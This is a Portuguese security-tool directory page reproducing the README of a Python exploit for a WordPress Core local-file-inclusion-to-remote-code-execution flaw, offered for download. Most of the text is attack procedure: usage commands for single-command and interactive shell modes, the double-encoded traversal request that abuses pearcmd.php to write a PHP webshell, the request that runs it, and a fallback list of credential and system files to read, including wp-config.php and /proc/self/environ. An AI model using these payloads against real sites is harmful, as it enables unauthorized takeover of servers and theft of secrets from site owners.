Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-87902 — Exploit em Python para CVE-2026-87902, uma cadeia LFI-to-RCE do WordPress Core. Identifica versões, grava um shell PHP via pearcmd e fornece execução de comandos ou fallback LFI. | Kitploit
Ferramentas/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoSegurança WebTestes de PenetraçãoFerramenta de Acesso Remoto
Desenvolvimento de Payloads
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

Exploit em Python para CVE-2026-87902, uma cadeia LFI-to-RCE do WordPress Core. Identifica versões, grava um shell PHP via pearcmd e fornece execução de comandos ou fallback LFI.

Ver Repositório
1há 12h 57mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cve-2026-87902

CVE-2026-87902 – Exploit de LFI para RCE no WordPress Core (Edição Auto-Forcing)

feito por alfaris

⚠️ AVISO LEGAL Usá-lo contra sistemas que não lhe pertencem ou para os quais não tem autorização escrita de teste é ilegal e punível ao abrigo das leis de cibercrime. O autor não assume qualquer responsabilidade pelo uso indevido.


📌 Resumo da Vulnerabilidade

CampoValor
CVECVE-2026-87902
TipoLocal File Inclusion (LFI) → Remote Code Execution (RCE)
CWECWE-98
CVSS v3.19.2 (Crítico)
Vetor de AtaqueRede (Não Autenticado)
AfetadoWordPress 4.7.0 – 7.1.1
CorrigidoWordPress 7.1.2 (e backports até 4.7.37)
Causa Raizget_page_template() não chama validate_file() após descodificar o URL do parâmetro pagename, permitindo travessia com dupla codificação (%252E%252E%252F) para contornar a sanitização e incluir ficheiros .php arbitrários fora do diretório do tema.

Pré-condições para RCE

Para RCE completo, todas as seguintes condições devem ser verdadeiras:

  1. Versão do WordPress entre 4.7.0 e 7.1.1
  2. O tema ativo contém um diretório page-* de nível superior (ex.: page-templates/)
  3. Existe pelo menos uma página publicada
  4. pearcmd.php está presente e é legível pelo utilizador do servidor web (padrão em imagens oficiais do PHP Docker e muitas instalações cPanel com PHP < 8.5)
  5. O PHP tem register_argc_argv=On (padrão em PHP < 8.5)
  6. O SO anfitrião é Linux (a sintaxe de travessia do Windows é diferente)

Se alguma destas condições faltar, o exploit recorre a leitura de ficheiros apenas via LFI.


📂 Ficheiros

exploit.py # Script de exploit principal README.md # Este ficheiro report.json # (opcional) Relatório de saída quando -o é usado

⚙️ Requisitos

  • Python 3.8+
  • Biblioteca requests

Instalação:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. Scan básico (verboso)
root@kitploit:~
python3 exploit.py -t https://site.com -v

Isto irá:

· Identificar a versão do WordPress e o tema ativo · Verificar o intervalo de versões vulneráveis · Localizar um ID de página publicada (REST → sitemap → força bruta) · Tentar escrever uma shell PHP via pearcmd.php · Tentar incluir a shell e executar id · Se o RCE falhar, recorrer a LFI em ficheiros sensíveis

  1. Executar um único comando
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. Shell interativa (apenas se o RCE tiver sucesso)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

Dentro da shell:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. Guardar relatório em JSON
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. Combinar opções
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 Referência da CLI

Flag Longa Descrição -t --target Obrigatório. URL do WordPress alvo (sem barra final). -c --command Executar um único comando de shell após o RCE. -i --interactive Abrir uma shell interativa após o RCE. -v --verbose Imprimir progresso detalhado. -o --output Guardar o relatório final em JSON no caminho indicado. -h --help Mostrar ajuda.

🔄 Fluxo do Exploit

root@kitploit:~
[1] Identificação
      ├─ Versão do WordPress (meta generator / asset ?ver=)
      └─ Tema ativo (/wp-content/themes/<name>/)

[2] Verificação de versão
      └─ 4.7.0 – 7.1.1 ? continuar : avisar e continuar

[3] Encontrar ID da página
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ Força bruta: /?page_id=1..30

[4] Verificar diretório page-*
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] Escrever shell via pearcmd
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] Incluir shell
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] LFI de recurso (se o RCE falhar)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ variantes ../..
Baixar ferramenta